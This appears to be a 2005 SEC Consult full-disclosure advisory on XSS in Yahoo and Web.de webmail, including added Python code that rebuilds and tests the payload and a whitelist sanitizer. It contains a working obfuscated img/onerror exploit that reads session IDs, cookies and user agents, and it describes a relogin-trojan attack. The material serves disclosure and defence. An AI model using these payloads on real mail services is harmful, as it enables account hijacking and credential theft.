title: A Word on Webmail Security and Browser related XSS Bugs
program: Multiple Webmail Solutions
found: ---
by: SEC Consult Vulnerability Lab / www.sec-consult.com
affected vendors: Yahoo, Web.de
original adv.: http://www.sec-consult.com/234.html
================================================================================
As you all know, it is a tedious task to secure webmail services against
Cross Site Scripting attacks if they provide HTML email functionality.
Within the last few years a new type of XSS attack has emerged: the
combination of classic XSS with the incorrect (overly tolerant) HTML
parsing of several web browsers (mostly MSIE) can lead to a dangerous
situation for webmail systems as well as other web applications. In
particular, inserting non-printable characters such as 0x00 or 0xff (but
many others as well) into tags and attributes can be used to trigger such
combined vulnerabilities: a server-side filter matching on "<script" sees
a broken tag, while the browser silently repairs it and runs the script.
Many vendors implement blacklist filters or other security measures,
while the root of the problem remains untouched. SEC Consult has been in
touch with various webmail vendors for quite some time, trying to make
this point clear. However, the situation has not changed, as the security
officers in charge do not show much interest in the matter. The tenor of
the replies (if any) to our advisories is that this is not a security
issue or is impossible to exploit. Eventually, specific Cross Site
Scripting vectors do get quietly fixed, but it is a matter of minutes to
find a new one.
In this security information, we will address fixed and unfixed Cross
Site Scripting flaws of large scale webmail providers to add some proof
for our ongoing allegations.
OUR LATEST YAHOO ADVISORY:
Product: Yahoo Webmail in combination with MSIE 6.0 (maybe other browsers)
Remarks: no other versions tested but very likely vulnerable
Vulnerabilities: Multiple XSS / Cookie theft / Relogin trojan
Vendor: Yahoo
Vendor-Status: first time vendor contacted (2005.09)
Vendor-Patches: patched in production environment
Object: MSIE (unknown version - 5.+)
Exploitable:
Local: ---
Remote: YES
Type: XSS - Cross Site Scripting - Cookie/Account Theft
Yahoo-Webmail Vulnerability #8/2005
Followup for http://seclists.org/lists/bugtraq/2005/Oct/0263.html
Yahoo's blacklists fail to detect script tags in combination with
SPECIAL/META characters.
This leaves webmail users running MSIE vulnerable to typical XSS /
relogin-trojan attacks.
XML/DATASRC
XML tag / datasrc attribute (MSIE data binding):
We would like to apologize in advance for potential nonconformities
and/or known issues.
Do not use MS Internet Explorer.
Do not use blacklists on tags and attributes. Whitelist the allowed
characters instead of blacklisting special/meta characters.
Vulnerability has been fixed in production environment.
… and in addition some examples taken from our Yahoo webmail XSS
Advisories from 2005.
… many more to come :)
Web.de is one of Germany's biggest webmail/freemail providers. Getting
JavaScript in HTML mails to run can be done with trivial standard tricks;
however, web.de claims to be unexploitable because of the security
measures in place. Firstly, session validation is based on three
variables: the User-ID cookie, the user agent, and the random session ID
which is passed along in every URL. As a second security measure, HTML
mails are loaded into their own frame from a different domain, and this
request is validated with an encrypted one-time token. Obviously, this
makes it more difficult to steal the main session ID, because the
victim's browser prevents the attacker's JavaScript code from scripting
across domains. Naturally, this "protection" can be circumvented. In our
proof of concept exploit, we first extract the original domain from
document.referrer (the mail frame is opened from the main site, so its
referrer carries the main site's host name). We then use this information
to open the main website in an iframe and leverage one of many other
Cross Site Scripting flaws on web.de. Our script now runs on the main
domain and has access to frames[0], where we can extract the session ID
from any link. We then extract the User-ID cookie and user agent by
standard means and pass them to our cookie logger, along with the
session ID.
THE FIRST WEB.DE ADVISORY:
REMARK:
When we wrote the first advisory for web.de we thought it would be
necessary to use a combination attack (browser quirk + XSS). After a
while we found out that the same goals can be achieved without using
special/meta characters at all.
Product: Web.de Freemail in combination with MSIE 6.0 (probably other
browsers)
Remarks: no other versions tested but very likely vulnerable
Vulnerabilities: Multiple XSS / Cookie theft / Relogin trojan
Vendor: Web.de (part of United Internet)
Vendor-Status: first time vendor contacted (2005.08)
Vendor-Patches: unpatched (vendor does not consider XSS a vulnerability)
Object: MSIE (unknown version - 5.+ / other browsers may be affected too)
Exploitable:
Local: ---
Remote: YES
Type: XSS - Cross Site Scripting - Relogin Trojan - Cookie/Account Theft
Web.de is one of the largest freemail providers in the German-speaking area.
Web.de - Webmail/Freemail Vulnerability #1/2005
Web.de's blacklists fail to detect script tags in combination with
SPECIAL/META characters. This leaves Freemail users running MSIE (and
most likely many other browsers) vulnerable to typical XSS /
relogin-trojan attacks. The people from web.de try to hide their
authentication tokens on another subdomain, which is of course not a
real security measure but rather "security by obscurity". Even if this
precaution prevented attackers from stealing session IDs and cookies, it
would never be sufficient against relogin-trojan attacks: script running
inside the mailbox can simply replace the page with a fake login form and
collect the password directly.
MANY (most likely every one that can be used to inject JavaScript or
VBScript)
<h1>Milk is for babies. When you grow up you have to drink beer.</h1><br>
<!-- onerror fires because x.png does not exist. _x is the web.de host name
     taken from document.referrer (the 21 characters after "https://"). The
     hex string decodes to an iframe that loads https://_x/home/webde_freemail.htm
     with a reflected XSS in the mc parameter; that script runs on the main
     domain, reads top.frames[0].document.links[1] (a main-page link carrying
     the session ID), navigator.userAgent and document.cookie, and shows them
     in an alert. The hex is split with + so that every line is a complete
     JavaScript string literal; unescape() sees the joined string. -->
<img src="x.png" onerror="var _x=document.referrer.substring(8,29);
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F')
+_x+unescape('%2F%68%6F%6D%65%2F%77%65%62%64%65%5F%66%72%65%65%6D%61%69%6C%2E%68%74%6D%3F%6D%63%3D%25%32%32%25%33%45%25%33%43'
+'%69%6D%67%25%32%30%73%72%63%25%33%44%6E%6F%77%68%65%72%65%25%32%30%6F%6E%65%72%72%6F%72%25%33%44%25%32%32%76%61%72%25%32%30%75'
+'%61%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%6E%61%76%69%67%61%74%6F%72%25%32%45%75%73%65%72%41%67%65%6E%74%25%32'
+'%39%25%33%42%76%61%72%25%32%30%63%6B%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%64%6F%63%75%6D%65%6E%74%25%32%45%63'
+'%6F%6F%6B%69%65%25%32%39%25%33%42%25%32%30%76%61%72%25%32%30%6C%6E%25%32%30%25%33%44%25%32%30%65%73%63%61%70%65%25%32%38%74%6F'
+'%70%25%32%45%66%72%61%6D%65%73%25%35%42%30%25%35%44%25%32%45%64%6F%63%75%6D%65%6E%74%25%32%45%6C%69%6E%6B%73%25%35%42%31%25%35'
+'%44%25%32%39%25%33%42%61%6C%65%72%74%25%32%38%25%32%37%25%32%41%25%32%41%25%32%41%25%32%30%6C%61%64%69%65%73%25%32%30%61%6E%64'
+'%25%32%30%67%65%6E%74%6C%65%6D%61%6E%25%33%41%25%32%30%25%32%41%25%32%41%25%32%41%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%75'
+'%61%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%42%63%6B%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32'
+'%42%6C%6E%25%32%42%25%32%37%25%35%43%72%25%35%43%6E%25%32%37%25%32%39%25%33%42%25%32%32%25%33%45%25%33%43%6E%6F%73%63%72%69%70'
+'%74%25%33%45%22%20%68%65%69%67%68%74%3D%31%20%77%69%64%74%68%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));"/>
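The staged payload above, rebuilt in readable form as an added example (this is not SEC Consult's code): it reconstructs the three stages of the web.de proof of concept from plain strings, runs a constructed, 2005-style string blacklist over each stage, and also shows the 0x00 insertion from the introduction slipping past the same filter. The host name, the blacklist patterns and the function names are assumptions for this example; the percent-encoding it produces is equivalent to, not byte-identical with, the advisory's.

```python
"""Why a string-matching blacklist misses the vectors on this page.

Added example, not SEC Consult's code. The blacklist, the host name and
the helper names are constructed for this demonstration."""
import re
from urllib.parse import quote, unquote

# Constructed blacklist of the kind the advisory argues against: fixed
# strings, matched against the wire form of the mail body.
BLACKLIST = [r"<\s*script", r"<\s*iframe", r"javascript\s*:",
             r"vbscript\s*:", r"document\.cookie"]


def blacklist_hits(html):
    """Patterns that match; an empty list means the filter lets the mail through."""
    return [p for p in BLACKLIST if re.search(p, html, re.IGNORECASE)]


def percent_encode_all(s):
    """Encode every byte as %XX, as the PoC does to keep '<iframe' out of the mail body."""
    return "".join("%%%02X" % b for b in s.encode("latin-1"))


def build_poc(host):
    """Rebuild the staged PoC. Returns (mail_body, iframe_markup, reflected_markup).

    host is the web.de mail host that document.referrer would reveal at
    runtime; it is an assumed value here."""
    # Stage 3: what the reflected `mc` parameter injects into the main page.
    # It runs on the main domain, so top.frames[0] and document.cookie are in reach.
    reflected = ('"><img src=nowhere onerror="var ua = escape(navigator.userAgent);'
                 'var ck = escape(document.cookie); var ln = escape(top.frames[0].document.links[1]);'
                 "alert('*** ladies and gentleman: ***\\r\\n'+ua+'\\r\\n'+ck+'\\r\\n'+ln+'\\r\\n');"
                 '"><noscript>')
    # Stage 2: the iframe that document.write() inserts into the mail frame.
    prefix = '<iframe src="https://'
    suffix = ('/home/webde_freemail.htm?mc=' + quote(reflected, safe="")
              + '" height=1 width=1></iframe>')
    iframe = prefix + host + suffix
    # Stage 1: the mail body. substring(8, 8+len(host)) cuts the host out of
    # "https://<host>/..." in the referrer; nothing but the img/onerror pair is in clear.
    body = ('<img src="x.png" onerror="var _x=document.referrer.substring(8,%d);'
            "document.write(unescape('%s')+_x+unescape('%s'));\"/>"
            % (8 + len(host), percent_encode_all(prefix), percent_encode_all(suffix)))
    return body, iframe, reflected


def unwrap(body):
    """Recover what the browser executes: first the unescape() layer in the mail
    body, then the URL-decoding the server applies to `mc`. Returns (iframe, mc)."""
    pieces = re.findall(r"unescape\('([^']*)'\)", body)
    iframe = unquote(pieces[0]) + "<host>" + unquote(pieces[1])
    mc = re.search(r'mc=([^"]*)"', iframe).group(1)
    return iframe, unquote(mc)


if __name__ == "__main__":
    body, iframe, reflected = build_poc("freemail.example.test")  # constructed host
    for label, stage in (("mail body", body), ("iframe", iframe), ("reflected mc", reflected)):
        print("%-12s blacklist hits: %s" % (label, blacklist_hits(stage)))
    print("0x00 variant hits:", blacklist_hits("<scr\x00ipt>alert(1)</scr\x00ipt>"))
```

Only the outer `<img ... onerror=` is visible to a filter that inspects the mail body; the iframe and the cookie-reading script only exist after unescape() in the victim's browser and after URL-decoding on the web.de server, i.e. on the far side of every place the provider's blacklist looks. The 0x00 variant fails for a different reason: the tag name the filter searches for is never present as a contiguous string, while MSIE still renders it.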
Do not use web.de's Freemail.
Do not use blacklists on tags and attributes. Whitelist the allowed
characters instead of blacklisting special/meta characters.
Vulnerability has not been fixed in production environment.
Remark regarding our disclosure policies:
Normally SEC Consult's disclosure policy forbids making vulnerabilities
public before they are fixed.
In a couple of telephone calls, with a LETTER and many e-mails, the
people from web.de could not be convinced that Cross Site Scripting is a
security vulnerability. Since it is not very likely that a fix will be
made available soon, we would like to inform the users of web.de about
this serious issue.
You must employ whitelist filters. Meaning: do not rely on filtering
"script", "javascript" and specific exploit strings. Deny HTML tags by
default, then allow the basic required tags and validate each of them,
including their attributes and the URLs they carry. SEC Consult and
other security professionals will not hesitate to give you free advice
on how to implement this correctly.
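A deny-by-default filter of the kind recommended above, as an added example (this is not SEC Consult's or any vendor's code): it is built on Python's html.parser, keeps only a whitelisted set of tags and attributes, accepts only absolute http(s) URLs made of printable ASCII, and discards script/style bodies, comments and declarations. The allowed tag set and the function names are assumptions for this example; a real deployment would extend the whitelist and also deal with CSS and character-set issues.

```python
"""Whitelist HTML filter for mail bodies: deny by default, allow a few tags.

Added example, not SEC Consult's or web.de's code. ALLOWED is an assumed,
deliberately small whitelist."""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# tag -> attributes that may survive on it (assumed whitelist)
ALLOWED = {
    "p": set(), "br": set(), "b": set(), "i": set(), "u": set(), "em": set(),
    "strong": set(), "h1": set(), "h2": set(), "h3": set(), "ul": set(),
    "ol": set(), "li": set(), "blockquote": set(),
    "a": {"href"}, "img": {"src", "alt"},
}
VOID = {"br", "img"}
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https"}
DROP_CONTENT = {"script", "style"}   # their bodies arrive as text and must not be echoed


def safe_url(value):
    """Accept only absolute http(s) URLs made of printable ASCII; None rejects the attribute."""
    value = value.strip()
    if any(not 0x20 <= ord(c) <= 0x7E for c in value):   # 0x00, 0xff and friends never get through
        return None
    parts = urlsplit(value)
    if parts.scheme.lower() not in SAFE_SCHEMES or not parts.netloc:
        return None
    return value


class WhitelistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.stack = []      # tags we emitted and still have to close
        self.dropping = 0    # > 0 while inside script/style

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.dropping += 1
            return
        if self.dropping or tag not in ALLOWED:
            return           # unknown tag disappears; its text content stays, escaped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue
            if name in URL_ATTRS:
                value = safe_url(value)
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        if tag == "img" and not any(k.startswith(" src=") for k in kept):
            return           # an image without an acceptable source is pointless
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):
        if tag in DROP_CONTENT:
            return           # self-closing <script/> has no body to drop
        self.handle_starttag(tag, attrs)
        if tag not in VOID and self.stack and self.stack[-1] == tag:
            self.handle_endtag(tag)

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.dropping = max(0, self.dropping - 1)
            return
        if self.dropping or tag not in self.stack:
            return
        while self.stack:    # close whatever was left open inside, keeping output well formed
            t = self.stack.pop()
            self.out.append("</%s>" % t)
            if t == tag:
                break

    def handle_data(self, data):
        if not self.dropping:
            self.out.append(escape(data, quote=False))

    # Comments, <!DOCTYPE>, <?pi?> and CDATA sections are dropped outright.
    def handle_comment(self, data): pass
    def handle_decl(self, decl): pass
    def handle_pi(self, data): pass
    def unknown_decl(self, data): pass


def sanitize(html):
    """Return a version of html that contains only whitelisted markup."""
    p = WhitelistSanitizer()
    p.feed(html)
    p.close()
    p.out.extend("</%s>" % t for t in reversed(p.stack))
    return "".join(p.out)


if __name__ == "__main__":
    print(sanitize('<h1>Milk</h1><br><img src="x.png" onerror="alert(1)"/>'))
    print(sanitize("<scr\x00ipt>alert(1)</scr\x00ipt>"))
```

Everything the parser does not recognise comes out as escaped text, so a mangled `<scr\x00ipt>` ends up visible on screen rather than as a tag, and MSIE's repair of broken tags has nothing to work on because the output contains no `<` the filter did not write itself. Note that the parser, not a regular expression, decides what a tag is, and that the decision is "is it on the list", never "is it on the blacklist".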
SEC Consult Unternehmensberatung GmbH
Office Vienna
Blindengasse 3
A-1080 Wien
Austria
Tel.: +43 / 1 / 409 0307 - 570
Fax.: +43 / 1 / 409 0307 - 590
Mail: office at sec-consult dot com
www.sec-consult.com
EOF SEC Consult Vulnerability Lab / @2005
research at sec-consult dot com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/